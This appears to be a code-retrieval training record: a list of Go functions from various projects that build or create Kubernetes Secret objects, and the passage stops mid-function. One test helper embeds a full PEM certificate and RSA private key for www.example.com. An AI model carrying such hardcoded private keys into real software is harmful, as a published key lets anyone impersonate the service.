{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func Create(c *client.Client, i *Instance) error {\n\tsecretType, err := detectSecretType(i.Type)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tsecret := v1.Secret{\n\t\tObjectMeta: metav1.ObjectMeta{\n\t\t\tName: i.Name,\n\t\t\tNamespace: i.Namespace,\n\t\t},\n\t\tData: map[string][]byte{\n\t\t\ti.Key: []byte(i.Value),\n\t\t},\n\t\tType: secretType,\n\t}\n\t_, err = c.Clientset.CoreV1().Secrets(i.Namespace).Create(\n\t\tcontext.TODO(),\n\t\t&secret,\n\t\tmetav1.CreateOptions{})\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func newSecretForCR(cr *ricobergerdev1alpha1.VaultSecret, data map[string][]byte) (*corev1.Secret, error) {\n\tlabels := map[string]string{}\n\tfor k, v := range cr.ObjectMeta.Labels {\n\t\tlabels[k] = v\n\t}\n\n\tannotations := map[string]string{}\n\tfor k, v := range cr.ObjectMeta.Annotations {\n\t\tannotations[k] = v\n\t}\n\n\tif cr.Spec.Templates != nil {\n\t\tnewdata := make(map[string][]byte)\n\t\tfor k, v := range cr.Spec.Templates {\n\t\t\ttemplated, err := runTemplate(cr, v, data)\n\t\t\tif err != nil {\n\t\t\t\treturn nil, fmt.Errorf(\"Template ERROR: %w\", err)\n\t\t\t}\n\t\t\tnewdata[k] = templated\n\t\t}\n\t\tdata = newdata\n\t}\n\n\treturn &corev1.Secret{\n\t\tObjectMeta: metav1.ObjectMeta{\n\t\t\tName: cr.Name,\n\t\t\tNamespace: cr.Namespace,\n\t\t\tLabels: labels,\n\t\t\tAnnotations: annotations,\n\t\t},\n\t\tData: data,\n\t\tType: cr.Spec.Type,\n\t}, nil\n}", "func CreateSecret(cr, namespace, app, description, name, key, value string) *corev1.Secret {\n\tlabels := map[string]string{\n\t\t\"app\": app,\n\t\t\"deployedby\": \"aqua-operator\",\n\t\t\"aquasecoperator_cr\": cr,\n\t}\n\tannotations := map[string]string{\n\t\t\"description\": description,\n\t}\n\tsecret := &corev1.Secret{\n\t\tTypeMeta: metav1.TypeMeta{\n\t\t\tAPIVersion: \"core/v1\",\n\t\t\tKind: \"Secret\",\n\t\t},\n\t\tObjectMeta: metav1.ObjectMeta{\n\t\t\tName: name,\n\t\t\tNamespace: namespace,\n\t\t\tLabels: labels,\n\t\t\tAnnotations: annotations,\n\t\t},\n\t\tType: corev1.SecretTypeOpaque,\n\t\tData: map[string][]byte{\n\t\t\tkey: []byte(value),\n\t\t},\n\t}\n\n\treturn secret\n}", "func (s Secret) Create() error {\n\tsecret := getSecret(s.Name, s.Namespace, s.labels)\n\tsecret.Type = s.secType\n\tsecret.Data = s.data\n\treturn Create(s.client, secret)\n}", "func newSecretForCR(cr *crdv1alpha1.VaultSecret) *corev1.Secret {\n\n\tsecret := vault.GetSecret(cr.Spec.Path)\n\n\tcr.Status.RequestId = secret.RequestID\n\n\tvar secretMap map[string][]byte\n\tsecretMap = make(map[string][]byte)\n\tfor key, secret := range secret.Data {\n\t\tsecretMap[key] = []byte(secret.(string))\n\t}\n\n\tlabels := map[string]string{\n\t\t\"app\": cr.Name,\n\t}\n\treturn &corev1.Secret{\n\t\tObjectMeta: metav1.ObjectMeta{\n\t\t\tName: cr.Name,\n\t\t\tNamespace: cr.Namespace,\n\t\t\tLabels: labels,\n\t\t},\n\t\tType: \"Opaque\",\n\t\tData: secretMap,\n\t}\n}", "func NewSecretFromRuntime(obj interface{}, config CtorConfig) K8sResource {\n\ts := &Secret{}\n\ts.FromRuntime(obj, config)\n\treturn s\n}", "func (r *SecretsResource) Create(request *http.Request) (rest.Resource, error) {\n\tvar secretCurrent api.SecretCurrent\n\n\tdefer request.Body.Close()\n\tdecoder := json.NewDecoder(request.Body)\n\tif err := decoder.Decode(&secretCurrent); err != nil {\n\t\treturn nil, rest.HTTPBadRequest.WithDetails(err.Error())\n\t}\n\tif secretCurrent.Current == nil {\n\t\treturn nil, rest.HTTPBadRequest.WithDetails(\"No current secret\")\n\t}\n\n\tif err := r.secrets.Add(request.Context(), secretCurrent.ID, secretCurrent.Type, *secretCurrent.Current); err != nil {\n\t\treturn nil, err\n\t}\n\treturn NewSecretResource(r.secrets, secretCurrent.ID, r.logger), nil\n}", "func newGCPSecretCR(namespace, creds string) *corev1.Secret {\n\treturn &corev1.Secret{\n\t\tType: \"Opaque\",\n\t\tTypeMeta: metav1.TypeMeta{\n\t\t\tKind: \"Secret\",\n\t\t\tAPIVersion: \"v1\",\n\t\t},\n\t\tObjectMeta: metav1.ObjectMeta{\n\t\t\tName: gcpSecretName,\n\t\t\tNamespace: namespace,\n\t\t},\n\t\tData: map[string][]byte{\n\t\t\t\"osServiceAccount.json\": []byte(creds),\n\t\t},\n\t}\n}", "func newSecretForCR(cr *keymanagementv1.SecretTemplate) *corev1.Secret {\n\treturn generate_secret.GenerateSecret(cr)\n}", "func (r *ReconcileParameterStore) newSecretForCR(cr *ssmv1alpha1.ParameterStore) (*corev1.Secret, error) {\n\tlabels := map[string]string{\n\t\t\"app\": cr.Name,\n\t}\n\tif r.ssmc == nil {\n\t\tr.ssmc = newSSMClient(nil)\n\t}\n\tref := cr.Spec.ValueFrom.ParameterStoreRef\n\tdata, err := r.ssmc.SSMParameterValueToSecret(ref)\n\tif err != nil {\n\t\treturn nil, errs.Wrap(err, \"failed to get json secret as map\")\n\t}\n\treturn &corev1.Secret{\n\t\tObjectMeta: metav1.ObjectMeta{\n\t\t\tName: cr.Name,\n\t\t\tNamespace: cr.Namespace,\n\t\t\tLabels: labels,\n\t\t},\n\t\tStringData: data,\n\t}, nil\n}", "func createSecret(t *testing.T, options *k8s.KubectlOptions, namespace string) string {\n\tconfigData := fmt.Sprintf(EXAMPLE_SECRET_YAML_TEMPLATE, namespace, namespace, namespace)\n\tk8s.KubectlApplyFromString(t, options, configData)\n\treturn configData\n}", "func (c *secrets) Create(ctx context.Context, secret *v1.Secret,\n\topts metav1.CreateOptions) (result *v1.Secret, err error) {\n\tresult = &v1.Secret{}\n\terr = c.client.Post().\n\t\tResource(\"secrets\").\n\t\tVersionedParams(opts).\n\t\tBody(secret).\n\t\tDo(ctx).\n\t\tInto(result)\n\n\treturn\n}", "func newSecret(name string) corev1.Secret {\n\tconst (\n\t\t// defaultCert is a PEM-encoded certificate.\n\t\tdefaultCert = `-----BEGIN CERTIFICATE-----\nMIIDIjCCAgqgAwIBAgIBBjANBgkqhkiG9w0BAQUFADCBoTELMAkGA1UEBhMCVVMx\nCzAJBgNVBAgMAlNDMRUwEwYDVQQHDAxEZWZhdWx0IENpdHkxHDAaBgNVBAoME0Rl\nZmF1bHQgQ29tcGFueSBMdGQxEDAOBgNVBAsMB1Rlc3QgQ0ExGjAYBgNVBAMMEXd3\ndy5leGFtcGxlY2EuY29tMSIwIAYJKoZIhvcNAQkBFhNleGFtcGxlQGV4YW1wbGUu\nY29tMB4XDTE2MDExMzE5NDA1N1oXDTI2MDExMDE5NDA1N1owfDEYMBYGA1UEAxMP\nd3d3LmV4YW1wbGUuY29tMQswCQYDVQQIEwJTQzELMAkGA1UEBhMCVVMxIjAgBgkq\nhkiG9w0BCQEWE2V4YW1wbGVAZXhhbXBsZS5jb20xEDAOBgNVBAoTB0V4YW1wbGUx\nEDAOBgNVBAsTB0V4YW1wbGUwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAM0B\nu++oHV1wcphWRbMLUft8fD7nPG95xs7UeLPphFZuShIhhdAQMpvcsFeg+Bg9PWCu\nv3jZljmk06MLvuWLfwjYfo9q/V+qOZVfTVHHbaIO5RTXJMC2Nn+ACF0kHBmNcbth\nOOgF8L854a/P8tjm1iPR++vHnkex0NH7lyosVc/vAgMBAAGjDTALMAkGA1UdEwQC\nMAAwDQYJKoZIhvcNAQEFBQADggEBADjFm5AlNH3DNT1Uzx3m66fFjqqrHEs25geT\nyA3rvBuynflEHQO95M/8wCxYVyuAx4Z1i4YDC7tx0vmOn/2GXZHY9MAj1I8KCnwt\nJik7E2r1/yY0MrkawljOAxisXs821kJ+Z/51Ud2t5uhGxS6hJypbGspMS7OtBbw7\n8oThK7cWtCXOldNF6ruqY1agWnhRdAq5qSMnuBXuicOP0Kbtx51a1ugE3SnvQenJ\nnZxdtYUXvEsHZC/6bAtTfNh+/SwgxQJuL2ZM+VG3X2JIKY8xTDui+il7uTh422lq\nwED8uwKl+bOj6xFDyw4gWoBxRobsbFaME8pkykP1+GnKDberyAM=\n-----END CERTIFICATE-----\n`\n\t\t// defaultKey is a PEM-encoded private key.\n\t\tdefaultKey = `-----BEGIN RSA PRIVATE KEY-----\nMIICWwIBAAKBgQDNAbvvqB1dcHKYVkWzC1H7fHw+5zxvecbO1Hiz6YRWbkoSIYXQ\nEDKb3LBXoPgYPT1grr942ZY5pNOjC77li38I2H6Pav1fqjmVX01Rx22iDuUU1yTA\ntjZ/gAhdJBwZjXG7YTjoBfC/OeGvz/LY5tYj0fvrx55HsdDR+5cqLFXP7wIDAQAB\nAoGAfE7P4Zsj6zOzGPI/Izj7Bi5OvGnEeKfzyBiH9Dflue74VRQkqqwXs/DWsNv3\nc+M2Y3iyu5ncgKmUduo5X8D9To2ymPRLGuCdfZTxnBMpIDKSJ0FTwVPkr6cYyyBk\n5VCbc470pQPxTAAtl2eaO1sIrzR4PcgwqrSOjwBQQocsGAECQQD8QOra/mZmxPbt\nbRh8U5lhgZmirImk5RY3QMPI/1/f4k+fyjkU5FRq/yqSyin75aSAXg8IupAFRgyZ\nW7BT6zwBAkEA0A0ugAGorpCbuTa25SsIOMxkEzCiKYvh0O+GfGkzWG4lkSeJqGME\nkeuJGlXrZNKNoCYLluAKLPmnd72X2yTL7wJARM0kAXUP0wn324w8+HQIyqqBj/gF\nVt9Q7uMQQ3s72CGu3ANZDFS2nbRZFU5koxrggk6lRRk1fOq9NvrmHg10AQJABOea\npgfj+yGLmkUw8JwgGH6xCUbHO+WBUFSlPf+Y50fJeO+OrjqPXAVKeSV3ZCwWjKT4\n9viXJNJJ4WfF0bO/XwJAOMB1wQnEOSZ4v+laMwNtMq6hre5K8woqteXICoGcIWe8\nu3YLAbyW/lHhOCiZu2iAI8AbmXem9lW6Tr7p/97s0w==\n-----END RSA PRIVATE KEY-----\n`\n\t)\n\treturn corev1.Secret{\n\t\tObjectMeta: metav1.ObjectMeta{\n\t\t\tName: name,\n\t\t},\n\t\tData: map[string][]byte{\n\t\t\t\"tls.crt\": []byte(defaultCert),\n\t\t\t\"tls.key\": []byte(defaultKey),\n\t\t},\n\t}\n}", "func newSecretForCR(cr *certmergev1alpha1.CertMerge) *corev1.Secret {\n\tlabels := map[string]string{\n\t\t\"certmerge\": cr.Name,\n\t\t\"creator\": \"certmerge-operator\",\n\t}\n\treturn &corev1.Secret{\n\t\tTypeMeta: metav1.TypeMeta{\n\t\t\tKind: \"Secret\",\n\t\t\tAPIVersion: \"v1\",\n\t\t},\n\t\tObjectMeta: metav1.ObjectMeta{\n\t\t\tName: cr.Spec.SecretName,\n\t\t\tNamespace: cr.Spec.SecretNamespace,\n\t\t\tLabels: labels,\n\t\t},\n\t\tType: corev1.SecretTypeOpaque,\n\t}\n}", "func (secretTemplateFactory) New(def client.ResourceDefinition, c client.Interface, gc interfaces.GraphContext) interfaces.Resource {\n\tsecret := parametrizeResource(def.Secret, gc, secretParamFields).(*v1.Secret)\n\treturn report.SimpleReporter{BaseResource: newSecret{Base: Base{def.Meta}, Secret: secret, Client: c.Secrets()}}\n}", "func createSecret(ingressType ingress.CallType, cn, ns string, ic IngressCredential) *v1.Secret {\n\tif ingressType == ingress.Mtls {\n\t\treturn &v1.Secret{\n\t\t\tObjectMeta: metav1.ObjectMeta{\n\t\t\t\tName: cn,\n\t\t\t\tNamespace: ns,\n\t\t\t},\n\t\t\tData: map[string][]byte{\n\t\t\t\tgenericScrtCert: []byte(ic.ServerCert),\n\t\t\t\tgenericScrtKey: []byte(ic.PrivateKey),\n\t\t\t\tgenericScrtCaCert: []byte(ic.CaCert),\n\t\t\t},\n\t\t}\n\t}\n\treturn &v1.Secret{\n\t\tObjectMeta: metav1.ObjectMeta{\n\t\t\tName: cn,\n\t\t\tNamespace: ns,\n\t\t},\n\t\tData: map[string][]byte{\n\t\t\ttlsScrtCert: []byte(ic.ServerCert),\n\t\t\ttlsScrtKey: []byte(ic.PrivateKey),\n\t\t},\n\t}\n}", "func NewSecret(\n\tc client.Client,\n\tname, namespace string,\n\tlabels map[string]string,\n\tsecType corev1.SecretType,\n\tdata map[string][]byte) *Secret {\n\treturn &Secret{\n\t\tNamespacedName: types.NamespacedName{\n\t\t\tName: name,\n\t\t\tNamespace: namespace,\n\t\t},\n\t\tlabels: labels,\n\t\tclient: c,\n\t\tsecType: secType,\n\t\tdata: data,\n\t}\n}", "func createSecret(clientset internalclientset.Interface, clientConfig *clientcmdapi.Config, namespace, federationName, joiningClusterName, contextName, secretName string, dryRun bool) (runtime.Object, error) {\n\t// Minify the kubeconfig to ensure that there is only information\n\t// relevant to the cluster we are registering.\n\tnewClientConfig, err := minifyConfig(clientConfig, contextName)\n\tif err != nil {\n\t\tglog.V(2).Infof(\"Failed to minify the kubeconfig for the given context %q: %v\", contextName, err)\n\t\treturn nil, err\n\t}\n\n\t// Flatten the kubeconfig to ensure that all the referenced file\n\t// contents are inlined.\n\terr = clientcmdapi.FlattenConfig(newClientConfig)\n\tif err != nil {\n\t\tglog.V(2).Infof(\"Failed to flatten the kubeconfig for the given context %q: %v\", contextName, err)\n\t\treturn nil, err\n\t}\n\n\treturn util.CreateKubeconfigSecret(clientset, newClientConfig, namespace, secretName, federationName, joiningClusterName, dryRun)\n}", "func newSecrets(c *APIV1Client) *secrets {\n\treturn &secrets{\n\t\tclient: c.RESTClient(),\n\t}\n}", "func Secret(objectMeta metav1.ObjectMeta, data map[string][]byte) *corev1.Secret {\n\treturn &corev1.Secret{\n\t\tObjectMeta: objectMeta,\n\t\tData: data,\n\t\tType: secretTypeForData(data),\n\t\tImmutable: pointer.Bool(true),\n\t}\n}", "func createSecret(hostFactory cmdutil.Factory, clientConfig *clientcmdapi.Config, namespace, contextName, secretName string, dryRun bool) (runtime.Object, error) {\n\t// Minify the kubeconfig to ensure that there is only information\n\t// relevant to the cluster we are registering.\n\tnewClientConfig, err := minifyConfig(clientConfig, contextName)\n\tif err != nil {\n\t\tglog.V(2).Infof(\"Failed to minify the kubeconfig for the given context %q: %v\", contextName, err)\n\t\treturn nil, err\n\t}\n\n\t// Flatten the kubeconfig to ensure that all the referenced file\n\t// contents are inlined.\n\terr = clientcmdapi.FlattenConfig(newClientConfig)\n\tif err != nil {\n\t\tglog.V(2).Infof(\"Failed to flatten the kubeconfig for the given context %q: %v\", contextName, err)\n\t\treturn nil, err\n\t}\n\n\t// Boilerplate to create the secret in the host cluster.\n\tclientset, err := hostFactory.ClientSet()\n\tif err != nil {\n\t\tglog.V(2).Infof(\"Failed to serialize the kubeconfig for the given context %q: %v\", contextName, err)\n\t\treturn nil, err\n\t}\n\n\treturn util.CreateKubeconfigSecret(clientset, newClientConfig, namespace, secretName, dryRun)\n}", "func newKeyFromSecret(secretLister internalinformers.SecretLister) keyFromSecretFunc {\n\treturn func(ctx context.Context, namespace, name, keyName string) (crypto.Signer, error) {\n\t\treturn kube.SecretTLSKeyRef(ctx, secretLister, namespace, name, keyName)\n\t}\n}", "func Create(ctx context.Context, dev *model.Dev, c *kubernetes.Clientset, s *syncthing.Syncthing) error {\n\tsecretName := GetSecretName(dev)\n\n\tsct, err := Get(ctx, secretName, dev.Namespace, c)\n\tif err != nil && !strings.Contains(err.Error(), \"not found\") {\n\t\treturn fmt.Errorf(\"error getting kubernetes secret: %s\", err)\n\t}\n\n\tconfig, err := getConfigXML(s)\n\tif err != nil {\n\t\treturn fmt.Errorf(\"error generating syncthing configuration: %s\", err)\n\t}\n\tdata := &v1.Secret{\n\t\tObjectMeta: metav1.ObjectMeta{\n\t\t\tName: secretName,\n\t\t\tLabels: map[string]string{\n\t\t\t\tconstants.DevLabel: \"true\",\n\t\t\t},\n\t\t},\n\t\tType: v1.SecretTypeOpaque,\n\t\tData: map[string][]byte{\n\t\t\t\"config.xml\": config,\n\t\t\t\"cert.pem\": []byte(certPEM),\n\t\t\t\"key.pem\": []byte(keyPEM),\n\t\t},\n\t}\n\n\tidx := 0\n\tfor _, s := range dev.Secrets {\n\t\tcontent, err := os.ReadFile(s.LocalPath)\n\t\tif err != nil {\n\t\t\treturn fmt.Errorf(\"error reading secret '%s': %s\", s.LocalPath, err)\n\t\t}\n\t\tif strings.Contains(s.GetKeyName(), \"stignore\") {\n\t\t\tidx++\n\t\t\tdata.Data[fmt.Sprintf(\"%s-%d\", s.GetKeyName(), idx)] = content\n\t\t} else {\n\t\t\tdata.Data[s.GetKeyName()] = content\n\t\t}\n\n\t}\n\n\tif sct.Name == \"\" {\n\t\t_, err := c.CoreV1().Secrets(dev.Namespace).Create(ctx, data, metav1.CreateOptions{})\n\t\tif err != nil {\n\t\t\treturn fmt.Errorf(\"error creating kubernetes sync secret: %s\", err)\n\t\t}\n\n\t\toktetoLog.Infof(\"created okteto secret '%s'\", secretName)\n\t} else {\n\t\t_, err := c.CoreV1().Secrets(dev.Namespace).Update(ctx, data, metav1.UpdateOptions{})\n\t\tif err != nil {\n\t\t\treturn fmt.Errorf(\"error updating kubernetes okteto secret: %s\", err)\n\t\t}\n\t\toktetoLog.Infof(\"updated okteto secret '%s'\", secretName)\n\t}\n\treturn nil\n}", "func Secret(s *dag.Secret) *envoy_api_v2_auth.Secret {\n\treturn &envoy_api_v2_auth.Secret{\n\t\tName: Secretname(s),\n\t\tType: &envoy_api_v2_auth.Secret_TlsCertificate{\n\t\t\tTlsCertificate: &envoy_api_v2_auth.TlsCertificate{\n\t\t\t\tPrivateKey: &envoy_api_v2_core.DataSource{\n\t\t\t\t\tSpecifier: &envoy_api_v2_core.DataSource_InlineBytes{\n\t\t\t\t\t\tInlineBytes: s.PrivateKey(),\n\t\t\t\t\t},\n\t\t\t\t},\n\t\t\t\tCertificateChain: &envoy_api_v2_core.DataSource{\n\t\t\t\t\tSpecifier: &envoy_api_v2_core.DataSource_InlineBytes{\n\t\t\t\t\t\tInlineBytes: s.Cert(),\n\t\t\t\t\t},\n\t\t\t\t},\n\t\t\t},\n\t\t},\n\t}\n}", "func NewSecret(client client.Client, namespace, name string, data map[string][]byte, secretNameWithPrefix bool) (string, *builder.Secret) {\n\tsecretName := SecretName(name, secretNameWithPrefix)\n\treturn secretName, builder.NewSecret(client).\n\t\tWithNamespacedName(namespace, secretName).\n\t\tWithKeyValues(data)\n}", "func (c *SecretConverter) newSecret() *corev1.Secret {\n\tsecret := &corev1.Secret{\n\t\tObjectMeta: metav1.ObjectMeta{\n\t\t\tName: c.keyvaultSecret.Name,\n\t\t\tNamespace: c.keyvaultSecret.Namespace,\n\t\t\tOwnerReferences: []metav1.OwnerReference{\n\t\t\t\t*metav1.NewControllerRef(c.keyvaultSecret, schema.GroupVersionKind{\n\t\t\t\t\tGroup: keyvaultsecretv1alpha1.SchemeGroupVersion.Group,\n\t\t\t\t\tVersion: keyvaultsecretv1alpha1.SchemeGroupVersion.Version,\n\t\t\t\t\tKind: \"KeyvaultSecret\",\n\t\t\t\t}),\n\t\t\t},\n\t\t},\n\t}\n\treturn secret\n}", "func Secret(s *dag.Secret) *envoy_tls_v3.Secret {\n\treturn &envoy_tls_v3.Secret{\n\t\tName: envoy.Secretname(s),\n\t\tType: &envoy_tls_v3.Secret_TlsCertificate{\n\t\t\tTlsCertificate: &envoy_tls_v3.TlsCertificate{\n\t\t\t\tPrivateKey: &envoy_core_v3.DataSource{\n\t\t\t\t\tSpecifier: &envoy_core_v3.DataSource_InlineBytes{\n\t\t\t\t\t\tInlineBytes: s.PrivateKey(),\n\t\t\t\t\t},\n\t\t\t\t},\n\t\t\t\tCertificateChain: &envoy_core_v3.DataSource{\n\t\t\t\t\tSpecifier: &envoy_core_v3.DataSource_InlineBytes{\n\t\t\t\t\t\tInlineBytes: s.Cert(),\n\t\t\t\t\t},\n\t\t\t\t},\n\t\t\t},\n\t\t},\n\t}\n}", "func (s existingSecret) Create() error {\n\treturn createExistingResource(s)\n}", "func MakeSecret(\n\tldr ifc.KvLoader, args *types.SecretArgs) (rn *yaml.RNode, err error) {\n\trn, err = makeBaseNode(\"Secret\", args.Name, args.Namespace)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tt := \"Opaque\"\n\tif args.Type != \"\" {\n\t\tt = args.Type\n\t}\n\tif _, err := rn.Pipe(\n\t\tyaml.FieldSetter{\n\t\t\tName: \"type\",\n\t\t\tValue: yaml.NewStringRNode(t)}); err != nil {\n\t\treturn nil, err\n\t}\n\tm, err := makeValidatedDataMap(ldr, args.Name, args.KvPairSources)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tif err = rn.LoadMapIntoSecretData(m); err != nil {\n\t\treturn nil, err\n\t}\n\tcopyLabelsAndAnnotations(rn, args.Options)\n\tsetImmutable(rn, args.Options)\n\treturn rn, nil\n}", "func (regionEnv *RegionEnv) createSecret(deploymentName string) bool {\n\tgvk := schema.GroupVersionKind{Version: \"v1\", Kind: \"Secret\"}\n\tmapping, _ := regionEnv.Mapper.RESTMapping(gvk.GroupKind(), gvk.Version)\n\tdynamicInterface := regionEnv.DynamicClient.Resource(mapping.Resource).Namespace(regionEnv.Cfg.Namespace)\n\n\tsecretData := make(map[string]interface{})\n\tfor _, secretRef := range regionEnv.Secrets {\n\t\tif secretRef.Kind == \"container\" {\n\t\t\tsecretData[secretRef.Name] = base64.StdEncoding.EncodeToString([]byte(secretRef.Value))\n\t\t}\n\t}\n\n\t// Use Kubernetes labels to easily find and delete old secrets.\n\tsecret := unstructured.Unstructured{\n\t\tObject: map[string]interface{}{\n\t\t\t\"apiVersion\": \"v1\",\n\t\t\t\"kind\": \"Secret\",\n\t\t\t\"metadata\": map[string]interface{}{\n\t\t\t\t\"name\": fmt.Sprintf(\"%s-%s\", deploymentName, regionEnv.Cfg.SHA),\n\t\t\t\t\"labels\": map[string]interface{}{\n\t\t\t\t\t\"app\": deploymentName,\n\t\t\t\t\t\"sha\": regionEnv.Cfg.SHA,\n\t\t\t\t},\n\t\t\t},\n\t\t\t\"data\": secretData,\n\t\t}}\n\n\t_, secretGetErr := dynamicInterface.Get(regionEnv.Context, secret.GetName(), metav1.GetOptions{})\n\n\t// Secret may already exist if this is a rollback.\n\tif secretGetErr == nil {\n\t\tregionEnv.Logger.Info(\"Secret already exists\")\n\t\treturn true\n\t}\n\tif !errors.IsNotFound(secretGetErr) {\n\t\tregionEnv.errf(\"Unexpected Secret get error\\n%s\", secretGetErr)\n\t\treturn false\n\t}\n\n\t_, secretErr := dynamicInterface.Create(regionEnv.Context, &secret,\n\t\tmetav1.CreateOptions{FieldManager: \"porter2k8s\"})\n\tif secretErr != nil {\n\t\tregionEnv.Errors = append(regionEnv.Errors, secretErr)\n\t\treturn false\n\t}\n\tregionEnv.Logger.Infof(\"Created Secret %s\", secret.GetName())\n\n\treturn true\n}", "func (sca *ServiceCatalogAPI) CreateSecret(secret *v1core.Secret) (*v1core.Secret, error) {\n\treturn sca.K8sClient.CoreV1().Secrets(secret.Namespace).Create(context.Background(), secret, v1.CreateOptions{})\n}", "func (s newSecret) Create() error {\n\tif err := checkExistence(s); err != nil {\n\t\tlog.Println(\"Creating\", s.Key())\n\t\ts.Secret, err = s.Client.Create(s.Secret)\n\t\treturn err\n\t}\n\treturn nil\n}", "func (a *apiServer) CreateSecret(ctx context.Context, request *pps.CreateSecretRequest) (response *emptypb.Empty, retErr error) {\n\tmetricsFn := metrics.ReportUserAction(ctx, a.reporter, \"CreateSecret\")\n\tdefer func(start time.Time) { metricsFn(start, retErr) }(time.Now())\n\n\tvar s v1.Secret\n\tif err := json.Unmarshal(request.GetFile(), &s); err != nil {\n\t\treturn nil, errors.Wrapf(err, \"failed to unmarshal secret\")\n\t}\n\n\tlabels := s.GetLabels()\n\tif labels[\"suite\"] != \"\" && labels[\"suite\"] != \"pachyderm\" {\n\t\treturn nil, errors.Errorf(\"invalid suite label set on secret: suite=%s\", labels[\"suite\"])\n\t}\n\tif labels == nil {\n\t\tlabels = map[string]string{}\n\t}\n\tlabels[\"suite\"] = \"pachyderm\"\n\tlabels[\"secret-source\"] = \"pachyderm-user\"\n\ts.SetLabels(labels)\n\n\tif _, err := a.env.KubeClient.CoreV1().Secrets(a.namespace).Create(ctx, &s, metav1.CreateOptions{}); err != nil {\n\t\treturn nil, errors.Wrapf(err, \"failed to create secret\")\n\t}\n\treturn &emptypb.Empty{}, nil\n}", "func createKafkaSecret(name string, namespace string, brokers string, username string, password string, eventHubNamespace string) *corev1.Secret {\n\treturn &corev1.Secret{\n\t\tTypeMeta: metav1.TypeMeta{\n\t\t\tKind: \"Secret\",\n\t\t\tAPIVersion: corev1.SchemeGroupVersion.String(),\n\t\t},\n\t\tObjectMeta: metav1.ObjectMeta{\n\t\t\tName: name,\n\t\t\tNamespace: namespace,\n\t\t\tLabels: map[string]string{\n\t\t\t\tconstants.KafkaSecretLabel: \"true\",\n\t\t\t},\n\t\t},\n\t\tData: map[string][]byte{\n\t\t\tconstants.KafkaSecretKeyBrokers: []byte(brokers),\n\t\t\tconstants.KafkaSecretKeyUsername: []byte(username),\n\t\t\tconstants.KafkaSecretKeyPassword: []byte(password),\n\t\t\tconstants.KafkaSecretKeyNamespace: []byte(eventHubNamespace),\n\t\t},\n\t}\n}", "func Create(ctx context.Context, client client.Client, namespace, name string, secretNameWithPrefix bool, class string, data map[string][]byte, keepObjects *bool, injectedLabels map[string]string, forceOverwriteAnnotations *bool) error {\n\tvar (\n\t\tsecretName, secret = NewSecret(client, namespace, name, data, secretNameWithPrefix)\n\t\tmanagedResource = New(client, namespace, name, class, keepObjects, nil, injectedLabels, forceOverwriteAnnotations).WithSecretRef(secretName)\n\t)\n\n\treturn deployManagedResource(ctx, secret, managedResource)\n}", "func NewSecrets(k8sClient kubernetes.Interface) *Secrets {\n\treturn &Secrets{\n\t\tk8sClient: k8sClient,\n\t}\n}", "func CreateSecret(name, ns string, typ v1.SecretType, data map[string][]byte) *v1.Secret {\n\ts := &v1.Secret{\n\t\tObjectMeta: metav1.ObjectMeta{\n\t\t\tName: name,\n\t\t\tNamespace: ns,\n\t\t},\n\t\tType: typ,\n\t}\n\ts.Data = data\n\n\treturn s\n}", "func NewSecretObject(app *v3.Application) corev1.Secret {\n\tdockercfgJSONContent, err := handleDockerCfgJSONContent(app.Spec.OptTraits.ImagePullConfig.Username, app.Spec.OptTraits.ImagePullConfig.Password, \"\", app.Spec.OptTraits.ImagePullConfig.Registry)\n\tif err != nil {\n\t\tlog.Errorf(\"Create docker secret failed for %s\", app.Namespace)\n\t\treturn corev1.Secret{}\n\t}\n\tdatamap := map[string][]byte{}\n\tdatamap[corev1.DockerConfigJsonKey] = dockercfgJSONContent\n\tsecret := corev1.Secret{\n\t\tObjectMeta: metav1.ObjectMeta{\n\t\t\tOwnerReferences: []metav1.OwnerReference{*metav1.NewControllerRef(app, v3.SchemeGroupVersion.WithKind(\"Application\"))},\n\t\t\tNamespace: app.Namespace,\n\t\t\tName: app.Name + \"-\" + \"registry-secret\",\n\t\t},\n\t\tData: datamap,\n\t\tType: corev1.SecretTypeDockerConfigJson,\n\t}\n\treturn secret\n}", "func NewSecretFromCrt(cr *gramolav1.AppService, name string, namespace string, crt []byte) *corev1.Secret {\n\tlabels := GetAppServiceLabels(cr, name)\n\treturn &corev1.Secret{\n\t\tTypeMeta: metav1.TypeMeta{\n\t\t\tKind: \"Secret\",\n\t\t\tAPIVersion: \"v1\",\n\t\t},\n\t\tObjectMeta: metav1.ObjectMeta{\n\t\t\tName: name,\n\t\t\tNamespace: namespace,\n\t\t\tLabels: labels,\n\t\t},\n\t\tData: map[string][]byte{\n\t\t\t\"ca.crt\": crt,\n\t\t},\n\t}\n}", "func (c *client) create(path string, data map[string]interface{}) (*library.Secret, error) {\n\tif strings.HasPrefix(\"secret/data\", c.config.Prefix) {\n\t\tdata = map[string]interface{}{\n\t\t\t\"data\": data,\n\t\t}\n\t}\n\n\t// send API call to create the secret\n\ts, err := c.Vault.Logical().Write(path, data)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn secretFromVault(s), nil\n}", "func CreateSecret(s *Sandbox, name string, data map[string][]byte) (*v1.Secret, error) {\n\tsecret := &v1.Secret{\n\t\tObjectMeta: metav1.ObjectMeta{\n\t\t\tName: name,\n\t\t},\n\t\tData: data,\n\t}\n\tvar err error\n\tif secret, err = s.f.Clientset.Core().Secrets(s.Namespace).Create(secret); err != nil {\n\t\treturn nil, err\n\t}\n\tklog.V(2).Infof(\"Secret %q:%q created\", s.Namespace, name)\n\n\treturn secret, nil\n}", "func (r *ReconcileVirtualcluster) createPKISecrets(caGroup *vcpki.ClusterCAGroup, namespace string) error {\n\t// create secret for root crt/key pair\n\trootSrt := secret.CrtKeyPairToSecret(secret.RootCASecretName,\n\t\tnamespace, caGroup.RootCA)\n\t// create secret for apiserver crt/key pair\n\tapiserverSrt := secret.CrtKeyPairToSecret(secret.APIServerCASecretName,\n\t\tnamespace, caGroup.APIServer)\n\t// create secret for etcd crt/key pair\n\tetcdSrt := secret.CrtKeyPairToSecret(secret.ETCDCASecretName,\n\t\tnamespace, caGroup.ETCD)\n\t// create secret for controller manager kubeconfig\n\tctrlMgrSrt := secret.KubeconfigToSecret(secret.ControllerManagerSecretName,\n\t\tnamespace, caGroup.CtrlMgrKbCfg)\n\t// create secret for admin kubeconfig\n\tadminSrt := 